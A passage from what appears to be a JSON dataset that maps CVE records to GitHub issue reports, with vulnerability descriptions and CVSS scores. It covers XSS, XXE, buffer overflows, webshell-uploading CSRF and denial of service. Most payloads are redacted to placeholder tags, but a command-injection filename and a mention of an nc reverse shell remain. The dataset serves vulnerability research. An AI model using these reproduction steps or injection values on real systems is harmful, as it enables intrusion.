  36604. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36605. "severity": "CRITICAL",
  36606. "baseScore": 9.8,
  36607. "impactScore": 5.9,
  36608. "exploitabilityScore": 3.9
  36609. },
  36610. {
  36611. "CVE_ID": "CVE-2019-13566",
  36612. "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1752",
  36613. "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1752",
  36614. "Repo_new": "ros/ros_comm",
  36615. "Issue_Created_At": "2019-07-10T19:24:37Z",
  36616. "description": "Potential buffer overflow. Copying the Internet host address of address >sin_addr into a local variable without checking the buffer length can cause a buffer overflow if the string copied is a long hostname obtained via a reverse DNS lookup rather than a short dotted-quad IP address. URLTAG",
  36617. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36618. "severity": "CRITICAL",
  36619. "baseScore": 9.8,
  36620. "impactScore": 5.9,
  36621. "exploitabilityScore": 3.9
  36622. },
  36623. {
  36624. "CVE_ID": "CVE-2019-13589",
  36625. "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2051",
  36626. "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2051",
  36627. "Repo_new": "rubygems/rubygems.org",
  36628. "Issue_Created_At": "2019-07-08T20:44:12Z",
  36629. "description": "paranoid2 version NUMBERTAG is compromised and a malware, please yank!. Hi, paranoid2 URLTAG version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported FILETAG and the code snippet is located at: PATHTAG APITAG URLTAG FILETAG",
  36630. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36631. "severity": "CRITICAL",
  36632. "baseScore": 9.8,
  36633. "impactScore": 5.9,
  36634. "exploitabilityScore": 3.9
  36635. },
  36636. {
  36637. "CVE_ID": "CVE-2019-13611",
  36638. "Issue_Url_old": "https://github.com/miguelgrinberg/python-engineio/issues/128",
  36639. "Issue_Url_new": "https://github.com/miguelgrinberg/python-engineio/issues/128",
  36640. "Repo_new": "miguelgrinberg/python-engineio",
  36641. "Issue_Created_At": "2019-07-14T11:07:57Z",
  36642. "description": "Websocket hijacking vulnerability (cross-site WebSocket hijacking). CORS headers only apply to XHR/fetch requests and are ignored by browsers during a WebSocket handshake, so a server cannot rely on CORS to keep other origins out and must validate the handshake's Origin header itself. Ref: FILETAG ERRORTAG TLDR; ERRORTAG",
  36643. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36644. "severity": "HIGH",
  36645. "baseScore": 8.8,
  36646. "impactScore": 5.9,
  36647. "exploitabilityScore": 2.8
  36648. },
  36649. {
  36650. "CVE_ID": "CVE-2019-13618",
  36651. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1250",
  36652. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1250",
  36653. "Repo_new": "gpac/gpac",
  36654. "Issue_Created_At": "2019-06-04T08:09:07Z",
  36655. "description": "heap buffer overflow in gf_m2ts_sync. hello\uff0cI found a heap buffer overflow bug in gpac. bug details URLTAG FILETAG",
  36656. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36657. "severity": "HIGH",
  36658. "baseScore": 7.5,
  36659. "impactScore": 3.6,
  36660. "exploitabilityScore": 3.9
  36661. },
  36662. {
  36663. "CVE_ID": "CVE-2019-13623",
  36664. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/789",
  36665. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/789",
  36666. "Repo_new": "nationalsecurityagency/ghidra",
  36667. "Issue_Created_At": "2019-07-14T15:31:57Z",
  36668. "description": "Arbitrary code execution through loading a malicious project. Describe the bug A path traversal vulnerability exists in APITAG from package APITAG This vulnerability allows attackers to overwrite arbitrary files in the system. To achieve arbitrary code execution, one of the solutions is to overwrite some critical ghidra modules, e.g., decompile module (In this case we need to know the installation path of ghidra). To Reproduce NUMBERTAG Load the malicious project NUMBERTAG malicious code will be executed when the decompile module is called. Expected behavior Here is a demo of the attack behavior. URLTAG url Environment (please complete the following information): OS: All systems Ghidra Version: until NUMBERTAG Remark The vulnerability was found by researchers from GTISC MENTIONTAG Tech.",
  36669. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36670. "severity": "HIGH",
  36671. "baseScore": 7.8,
  36672. "impactScore": 5.9,
  36673. "exploitabilityScore": 1.8
  36674. },
  36675. {
  36676. "CVE_ID": "CVE-2019-13625",
  36677. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/71",
  36678. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/71",
  36679. "Repo_new": "nationalsecurityagency/ghidra",
  36680. "Issue_Created_At": "2019-03-06T21:20:30Z",
  36681. "description": "Project handling is susceptible to XXE. Describe the bug Project open/restore is susceptible to XML External Entity Expansion attacks. This can be exploited in various ways by getting someone to open/restore a project prepared by attacker. To Reproduce Steps to reproduce the behavior NUMBERTAG Create a project, and close it NUMBERTAG Put an XXE payload in any of the XML files in the project directory (see screenshot for example NUMBERTAG Open the project NUMBERTAG Observe your payload doing its thing. The same concept works with archived projects (.gar files) too. Expected behavior The XML parser should ignore external entities. For bonus points, it should give an error/warning when they are present. Screenshots The following screenshot was made of a proof of concept that only issues an HTTP GET request to localhost. Ghidra XXE APITAG URLTAG Environment (please complete the following information): OS: Kali Linux Rolling JDK Version: APITAG NUMBERTAG APITAG Debian NUMBERTAG Ghidra Version NUMBERTAG",
  36682. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  36683. "severity": "CRITICAL",
  36684. "baseScore": 9.1,
  36685. "impactScore": 5.2,
  36686. "exploitabilityScore": 3.9
  36687. },
  36688. {
  36689. "CVE_ID": "CVE-2019-13640",
  36690. "Issue_Url_old": "https://github.com/qbittorrent/qBittorrent/issues/10925",
  36691. "Issue_Url_new": "https://github.com/qbittorrent/qbittorrent/issues/10925",
  36692. "Repo_new": "qbittorrent/qbittorrent",
  36693. "Issue_Created_At": "2019-07-15T00:04:58Z",
  36694. "description": "FILETAG . Also UTF NUMBERTAG Steps to reproduce NUMBERTAG Configure APITAG to run an external script in Preferences Downloads. Anything is valid. You can even quote the arguments. For example: APITAG NUMBERTAG Create a new torrent with the following command: APITAG To test it locally with already created content, without needing to upload your torrent to a public tracker, create a directory named APITAG firefox ; \"' (without the first and last quotes) that has the same values as the previous command's APITAG This will re hash the content and mark it as completed, executing the script. You can use midnight commander to do this NUMBERTAG When the torrent download finishes, Firefox is opened Greetings",
  36695. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36696. "severity": "CRITICAL",
  36697. "baseScore": 9.8,
  36698. "impactScore": 5.9,
  36699. "exploitabilityScore": 3.9
  36700. },
  36701. {
  36702. "CVE_ID": "CVE-2019-13643",
  36703. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1349",
  36704. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1349",
  36705. "Repo_new": "espocrm/espocrm",
  36706. "Issue_Created_At": "2019-07-12T13:10:20Z",
  36707. "description": "Stored XSS in Stream messages APITAG NUMBERTAG Description Current version of APITAG NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in Stream messages. Malicious attacker can create specially crafted link, which contains javascript code and assign it to any user in the system. After the link is clicked malicious javascript code will be executed in user browser. APITAG Make the following request (insert your authentication data and hostname) CODETAG Then open the notifications and click the link. FILETAG",
  36708. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36709. "severity": "MEDIUM",
  36710. "baseScore": 6.1,
  36711. "impactScore": 2.7,
  36712. "exploitabilityScore": 2.8
  36713. },
  36714. {
  36715. "CVE_ID": "CVE-2019-13644",
  36716. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2335",
  36717. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2335",
  36718. "Repo_new": "firefly-iii/firefly-iii",
  36719. "Issue_Created_At": "2019-07-15T14:27:10Z",
  36720. "description": "Stored XSS in budget name. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in budget name. Malicious attacker can create specially crafted link, which contains javascript code and assign it to budget name. User who add transactions with malicious budget, can view page with that transaction on tag summary page ( URLTAG malicious javascript code will be executed. Steps to reproduce I create a small video for reproduce steps FILETAG APITAG CODETAG APITAG",
  36721. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  36722. "severity": "MEDIUM",
  36723. "baseScore": 5.4,
  36724. "impactScore": 2.7,
  36725. "exploitabilityScore": 2.3
  36726. },
  36727. {
  36728. "CVE_ID": "CVE-2019-13645",
  36729. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2337",
  36730. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2337",
  36731. "Repo_new": "firefly-iii/firefly-iii",
  36732. "Issue_Created_At": "2019-07-16T11:57:57Z",
  36733. "description": "Stored XSS in filename. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in file names. Malicious attacker can upload specially crafted image, which contains javascript code in its name. Malicious javascript code will be executed when user edit this attachment ( URLTAG But this file can be created only on Linux or you can edit field name in local proxy (e.g. Burp Suite) If you want to edit request you should change this part of request, mainly filename part ERRORTAG Request ERRORTAG Steps to reproduce NUMBERTAG Download attached zip file and extract image (but it works only on Linux 'cause of characters in filename NUMBERTAG Create new or update exist transaction and upload file NUMBERTAG After uploaded attachment go to attachment page and click to edit this file APITAG image APITAG Image for testing FILETAG",
  36734. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  36735. "severity": "MEDIUM",
  36736. "baseScore": 5.4,
  36737. "impactScore": 2.7,
  36738. "exploitabilityScore": 2.3
  36739. },
  36740. {
  36741. "CVE_ID": "CVE-2019-13646",
  36742. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2339",
  36743. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2339",
  36744. "Repo_new": "firefly-iii/firefly-iii",
  36745. "Issue_Created_At": "2019-07-16T11:58:01Z",
  36746. "description": "Reflected XSS in search query. Description Current version of Firefly III Version NUMBERTAG is vulnerable to reflected XSS due to lack of filtration of user supplied data in the search query. A malicious attacker can create a specially crafted request which contains javascript code in it. The malicious javascript code will be executed when a user opens this link. This can be easily reproduced in Mozilla Firefox; if you want to reproduce it in Chrome you should first turn off the XSS auditor in it. Request http:// insert your host here APITAG APITAG image APITAG",
  36747. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  36748. "severity": "MEDIUM",
  36749. "baseScore": 5.4,
  36750. "impactScore": 2.7,
  36751. "exploitabilityScore": 2.3
  36752. },
  36753. {
  36754. "CVE_ID": "CVE-2019-13647",
  36755. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2338",
  36756. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2338",
  36757. "Repo_new": "firefly-iii/firefly-iii",
  36758. "Issue_Created_At": "2019-07-16T11:57:58Z",
  36759. "description": "Stored XSS in file content. Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in files content. Malicious attacker can upload specially crafted image, which contains javascript code. Malicious javascript code will be executed when user view this attachment ( URLTAG Steps to reproduce NUMBERTAG Download attached zip file and extract svg image or create svg file with contains from bottom NUMBERTAG Create new or update exist transaction and upload svgfile.svg NUMBERTAG After uploaded attachment click on filename APITAG image APITAG Image for testing FILETAG Content of svgfile.svg CODETAG",
  36760. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  36761. "severity": "MEDIUM",
  36762. "baseScore": 5.4,
  36763. "impactScore": 2.7,
  36764. "exploitabilityScore": 2.3
  36765. },
  36766. {
  36767. "CVE_ID": "CVE-2019-13951",
  36768. "Issue_Url_old": "https://github.com/gdnsd/gdnsd/issues/185",
  36769. "Issue_Url_new": "https://github.com/gdnsd/gdnsd/issues/185",
  36770. "Repo_new": "gdnsd/gdnsd",
  36771. "Issue_Created_At": "2019-07-18T13:16:22Z",
  36772. "description": "Multiple stack based buffer overflow. Hi, I found two occurences of stack based buffer overflow when fuzzing gdnsd with American Fuzzy Lop NUMBERTAG The first occurence happens in the APITAG function, in zscan_rfc NUMBERTAG rl, and can be triggered with the following input: APITAG The issue can be be reproduced by creating a 'zones' directory, putting the above input in a file within the 'zones' directory, and running: APITAG Because no bounds checking is being done in the APITAG function, 'len' ends up being larger than NUMBERTAG ERRORTAG It seems your parser is attempting to parse malformed IP NUMBERTAG addresses until there is no input left, as I have been able to get 'len' to reach very large values when generating malformed IP NUMBERTAG address strings spawning several gigabytes, which gdnsd will happily attempt to parse NUMBERTAG The second occurence happens in the APITAG function, in zscan_rfc NUMBERTAG rl, and can be triggered with the following input: APITAG Because no bounds checking is being done in the APITAG function, 'len' ends up being larger than INET6_ADDRSTRLEN NUMBERTAG ERRORTAG As previously, the parser will happily parse malformed IP NUMBERTAG address strings spawning several gigabytes.",
  36773. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36774. "severity": "CRITICAL",
  36775. "baseScore": 9.8,
  36776. "impactScore": 5.9,
  36777. "exploitabilityScore": 3.9
  36778. },
  36779. {
  36780. "CVE_ID": "CVE-2019-13959",
  36781. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/394",
  36782. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/394",
  36783. "Repo_new": "axiomatic-systems/bento4",
  36784. "Issue_Created_At": "2019-05-14T06:23:56Z",
  36785. "description": "Null Pointer Dereference(npd) Bug. Hi, recently when I experimented with the new version of bento4, I found an NPD bug in the program \"mp NUMBERTAG aac\". The bug logic is that when the data size is not large enough and a reallocation is applied, the reallocation does not check whether the new buffer was successfully allocated. This is the execution trace. FILETAG In APITAG the function reallocates the buffer when the new size is larger than the current one. This means the two size variables are not zero. FILETAG In the reallocation, there is no null pointer check for the return value of the allocation, and a NULL return is then used as the destination of APITAG which is an alias of the memcpy function, leading to the crash. I have uploaded the report and related bug trace to help understand this problem. FILETAG",
  36786. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36787. "severity": "MEDIUM",
  36788. "baseScore": 6.5,
  36789. "impactScore": 3.6,
  36790. "exploitabilityScore": 2.8
  36791. },
  36792. {
  36793. "CVE_ID": "CVE-2019-13960",
  36794. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/337",
  36795. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/337",
  36796. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  36797. "Issue_Created_At": "2019-02-27T12:18:55Z",
  36798. "description": "Potential memory leak bug. Recently, I use my fuzzer to check the project and find a memory leak or potential overflow problem. This is the version: APITAG This is the input: FILETAG You can use ./djpeg file to reproduce the memory leak. APITAG This is the result with gdb.",
  36799. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36800. "severity": "MEDIUM",
  36801. "baseScore": 5.5,
  36802. "impactScore": 3.6,
  36803. "exploitabilityScore": 1.8
  36804. },
  36805. {
  36806. "CVE_ID": "CVE-2019-13961",
  36807. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/39",
  36808. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/39",
  36809. "Repo_new": "flatcore/flatcore-cms",
  36810. "Issue_Created_At": "2019-05-26T14:41:54Z",
  36811. "description": "Bug Report: CSRF Vulnerability in FILETAG on APITAG Title: CSRF Vulnerability in FILETAG on APITAG Date NUMBERTAG May NUMBERTAG Discovered by: MENTIONTAG from ABT Labs Security: high (will cause the webshell to upload) Software: FILETAG Code: FILETAG There is no csrf check, only have a administrator APITAG there is no check on the file type, and did not change the uploaded file name) FILETAG Description: Using Cross Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. Exploit: We assume that APITAG is installed at URLTAG Our target is PATHTAG which is the page used to upload a new file. The given POC will upload a webshell to the website which has full administrator privileges. APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Before visit the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The webshell have been uploaded. Screenshots: First, administrator login. FILETAG Then, administrator visit the malicious webpage. FILETAG Attacker visit webshell. FILETAG Suggest: Check CSRF tokens in all POST request.",
  36812. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36813. "severity": "HIGH",
  36814. "baseScore": 8.8,
  36815. "impactScore": 5.9,
  36816. "exploitabilityScore": 2.8
  36817. },
  36818. {
  36819. "CVE_ID": "CVE-2019-13970",
  36820. "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/151",
  36821. "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/151",
  36822. "Repo_new": "antswordproject/antsword",
  36823. "Issue_Created_At": "2019-04-18T10:37:47Z",
  36824. "description": "APITAG self XSS Vulnerability leads to RCE. APITAG APITAG APITAG APITAG ERRORTAG APITAG \u5f00\u542fnc NUMBERTAG shell APITAG \u6216\u8005\u4f60\u53ea\u60f3\u5f39\u4e2a\u7a97\u4e5f\u884c APITAG self xss\u4e5f\u8bf7\u4fee\u590d\u4e00\u4e0b :D",
  36825. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36826. "severity": "MEDIUM",
  36827. "baseScore": 6.1,
  36828. "impactScore": 2.7,
  36829. "exploitabilityScore": 2.8
  36830. },
  36831. {
  36832. "CVE_ID": "CVE-2019-13979",
  36833. "Issue_Url_old": "https://github.com/directus/api/issues/979",
  36834. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/979",
  36835. "Repo_new": "directus/v8-archive",
  36836. "Issue_Created_At": "2019-05-28T17:04:12Z",
  36837. "description": "FILETAG It was also possible to see that every user has a direct access to the uploaded file: FILETAG And FILETAG Once, an attacker knows which type of shell he needs the next step is uploading web shell itself: FILETAG It is possible to see that an attacker is able to run commands on the backend server itself, thus can completely compromise the server. What problem does this feature solve? Fixes security hole. How do you think this should be implemented? The uploaded file types must be restricted only to the necessary file types and be validated on the server side. Uploaded directory should not have any execute permission and all the script handlers should be removed from these directories. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  36838. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36839. "severity": "HIGH",
  36840. "baseScore": 8.8,
  36841. "impactScore": 5.9,
  36842. "exploitabilityScore": 2.8
  36843. },
  36844. {
  36845. "CVE_ID": "CVE-2019-13981",
  36846. "Issue_Url_old": "https://github.com/directus/api/issues/986",
  36847. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/986",
  36848. "Repo_new": "directus/v8-archive",
  36849. "Issue_Created_At": "2019-05-28T21:05:53Z",
  36850. "description": "FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Do not let users to get access to upload files that were uploaded by another users. Image ID should be chosen by unpredictable way and one time random token should be appended to the link in order to prevent exact link guessing. Implement an authorization mechanism that validate if user authorized to view or download the specific file. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  36851. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  36852. "severity": "MEDIUM",
  36853. "baseScore": 5.3,
  36854. "impactScore": 1.4,
  36855. "exploitabilityScore": 3.9
  36856. },
  36857. {
  36858. "CVE_ID": "CVE-2019-13981",
  36859. "Issue_Url_old": "https://github.com/directus/api/issues/987",
  36860. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/987",
  36861. "Repo_new": "directus/v8-archive",
  36862. "Issue_Created_At": "2019-05-28T21:40:03Z",
  36863. "description": "FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? As a general rule, system components should not be accessible to unauthenticated users (excluding the authentication component, which is unique, as unauthenticated access to it is a functional requirement). The authentication enforcement mechanism should be thoroughly and comprehensively implemented in the system. The authentication validation should be performed as the first validation in each access to the system. The accessing entity should be obligated to authenticate with the system as a pre condition to use the system\u2019s services. After a successful authentication process, the user server side session storage should be \"populated\" with the permissions of authorized actions. It is recommended to use authentication enforcement mechanisms that operate globally (effectively affecting all components), instead of implementing authentication validation within each separate component. Authentication validation implementation through applicative filters or infrastructure authentication declarations is highly recommended, since it is less likely to be prone to authentication flaws resulting from human error. Furthermore, these mechanisms are easier to manage and are usually well tested and widely used. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  36864. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  36865. "severity": "MEDIUM",
  36866. "baseScore": 5.3,
  36867. "impactScore": 1.4,
  36868. "exploitabilityScore": 3.9
  36869. },
  36870. {
  36871. "CVE_ID": "CVE-2019-13983",
  36872. "Issue_Url_old": "https://github.com/directus/api/issues/991",
  36873. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/991",
  36874. "Repo_new": "directus/v8-archive",
  36875. "Issue_Created_At": "2019-05-30T11:03:57Z",
  36876. "description": "[SECURITY] Insufficient Anti Automation \u2013 Brute Force Attack. Feature Request About audited Directus version. It has been cloned from suite repo. Latest commit URLTAG Description: Insufficient Anti automation occurs when a web application permits an attacker to automate a process that was originally designed to be performed only in a manual fashion, i.e. by a human web user. Business risk: Once exploited, attackers can use an automatic tool or a simple script that performs a brute force authentication attempts, and possible cause a legitimate user lock out. Technical details: The login mechanism of the application does not prevent a brute force on login attempts and on change password function. What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Implement an anti automation mechanism such as CAPTCHA Note: do not use account locking, because of the ability to perform a APITAG on user accounts. Complementary instructions for protecting brute forcing on users can be found in the following URL: URLTAG URLTAG Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  36877. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36878. "severity": "CRITICAL",
  36879. "baseScore": 9.8,
  36880. "impactScore": 5.9,
  36881. "exploitabilityScore": 3.9
  36882. },
  36883. {
  36884. "CVE_ID": "CVE-2019-13990",
  36885. "Issue_Url_old": "https://github.com/quartz-scheduler/quartz/issues/467",
  36886. "Issue_Url_new": "https://github.com/quartz-scheduler/quartz/issues/467",
  36887. "Repo_new": "quartz-scheduler/quartz",
  36888. "Issue_Created_At": "2019-07-22T06:36:17Z",
  36889. "description": "Security: XXE in APITAG The method APITAG in the APITAG does not forbid DTDs, which allows a context dependend attacker to perfom an XXE URLTAG . I reported this issue to the MITRE cooperation already which assigned the identifier CVETAG to this vulnerability. The OWASP Foundation provides an FILETAG that explains in detail the steps to prevent this security issue.",
  36890. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36891. "severity": "CRITICAL",
  36892. "baseScore": 9.8,
  36893. "impactScore": 5.9,
  36894. "exploitabilityScore": 3.9
  36895. },
  36896. {
  36897. "CVE_ID": "CVE-2019-14241",
  36898. "Issue_Url_old": "https://github.com/haproxy/haproxy/issues/181",
  36899. "Issue_Url_new": "https://github.com/haproxy/haproxy/issues/181",
  36900. "Repo_new": "haproxy/haproxy",
  36901. "Issue_Created_At": "2019-07-22T10:19:51Z",
  36902. "description": "Haproxy NUMBERTAG stuck thread. APITAG Output of APITAG and ERRORTAG ERRORTAG What's the configuration? APITAG Thread NUMBERTAG act NUMBERTAG glob NUMBERTAG wq NUMBERTAG rq NUMBERTAG tl NUMBERTAG tlsz NUMBERTAG rqsz NUMBERTAG haproxy NUMBERTAG stuck NUMBERTAG fdcache NUMBERTAG prof NUMBERTAG harmless NUMBERTAG wantrd NUMBERTAG haproxy NUMBERTAG cpu_ns: poll NUMBERTAG now NUMBERTAG diff NUMBERTAG haproxy NUMBERTAG curr_task NUMBERTAG e NUMBERTAG ce6b0 (task) calls NUMBERTAG last NUMBERTAG haproxy NUMBERTAG fct NUMBERTAG e NUMBERTAG a NUMBERTAG process_stream) ct NUMBERTAG e NUMBERTAG haproxy NUMBERTAG strm NUMBERTAG e NUMBERTAG APITAG fe=standaardsite APITAG dst=unknown haproxy NUMBERTAG rqf NUMBERTAG rqa NUMBERTAG rpf NUMBERTAG rpa NUMBERTAG sif=EST NUMBERTAG sib=INI NUMBERTAG haproxy NUMBERTAG af=(nil NUMBERTAG csf NUMBERTAG e NUMBERTAG b NUMBERTAG haproxy NUMBERTAG ab=(nil NUMBERTAG csb=(nil NUMBERTAG haproxy NUMBERTAG APITAG haproxy NUMBERTAG APITAG haproxy NUMBERTAG ALERT NUMBERTAG Current worker NUMBERTAG exited with code NUMBERTAG APITAG haproxy NUMBERTAG ALERT NUMBERTAG exit on failure: killing every processes with SIGTERM haproxy NUMBERTAG WARNING NUMBERTAG All workers exited. Exiting NUMBERTAG systemd NUMBERTAG APITAG Main process exited, code=exited, PATHTAG systemd NUMBERTAG APITAG Failed with result 'exit code'. systemd NUMBERTAG APITAG Service hold off time over, scheduling restart. systemd NUMBERTAG APITAG Scheduled restart job, restart counter is at NUMBERTAG On our fallback APITAG instances (running NUMBERTAG and earlier) we have not seen this behaviour.",
  36903. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36904. "severity": "HIGH",
  36905. "baseScore": 7.5,
  36906. "impactScore": 3.6,
  36907. "exploitabilityScore": 3.9
  36908. },
  36909. {
  36910. "CVE_ID": "CVE-2019-14243",
  36911. "Issue_Url_old": "https://github.com/mastercactapus/caddy-proxyprotocol/issues/8",
  36912. "Issue_Url_new": "https://github.com/mastercactapus/caddy-proxyprotocol/issues/8",
  36913. "Repo_new": "mastercactapus/caddy-proxyprotocol",
  36914. "Issue_Created_At": "2019-07-22T18:27:29Z",
  36915. "description": "Denial of service vulnerability with invalid NUMBERTAG PROXY data. I opened an issue describing a APITAG vulnerability in the APITAG package used by this plugin: URLTAG This code is the only consumer of the package I was able to find with light googling/github searching. Since fixing the APITAG parsing bug will require an updated version of this plugin I wanted to file an issue here as well so it doesn't fall through the cracks.",
  36916. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36917. "severity": "HIGH",
  36918. "baseScore": 7.5,
  36919. "impactScore": 3.6,
  36920. "exploitabilityScore": 3.9
  36921. },
  36922. {
  36923. "CVE_ID": "CVE-2019-14243",
  36924. "Issue_Url_old": "https://github.com/mastercactapus/proxyprotocol/issues/1",
  36925. "Issue_Url_new": "https://github.com/mastercactapus/proxyprotocol/issues/1",
  36926. "Repo_new": "mastercactapus/proxyprotocol",
  36927. "Issue_Created_At": "2019-07-22T18:25:46Z",
  36928. "description": "Invalid NUMBERTAG PROXY data causes parsing panics/denial of service. :wave: hi MENTIONTAG I was looking into the APITAG NUMBERTAG PROXY protocol and found your package. Unfortunately I found a class of crasher bugs when the library is presented malformed input. The APITAG 's APITAG function doesn't validate that the length of the buffered data is large enough to ensure that the slicing done to extract src/dest IP addresses (and ports where applicable) won't be out of bounds. Here's a small reproduction program: ERRORTAG The inline comment shows where the panic occurs. You can change the panic location by switching the APITAG byte to one of the other supported APITAG values in the parsing switch statement URLTAG . All supported APITAG 's are affected by this class of bug. Notably this results in a trivial denial of service attack against upstream consumers of this package. I was able to reproduce this crash with your caddy proxyprotocol URLTAG plugin, Caddy NUMBERTAG and the following Caddy file: APITAG Here's the output from the Caddy server after receiving the payload from the reproduction above: ERRORTAG I think its likely worth treating this as a denial of service vulnerability and releasing a new version of both this library and the upstream APITAG plugin with a note indicating users should upgrade. As an additional note because of when this panic occurs there is no audit trail in the configured APITAG and it brings down the entire webserver, not just the Go routine handling the request. Unfortunately I don't have the cycles to develop a fix for this bug. I'm not a Caddy user or a APITAG user, just a curious dev.",
  36929. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36930. "severity": "HIGH",
  36931. "baseScore": 7.5,
  36932. "impactScore": 3.6,
  36933. "exploitabilityScore": 3.9
  36934. },
  36935. {
  36936. "CVE_ID": "CVE-2019-14268",
  36937. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5739",
  36938. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5739",
  36939. "Repo_new": "octopusdeploy/issues",
  36940. "Issue_Created_At": "2019-07-25T01:42:06Z",
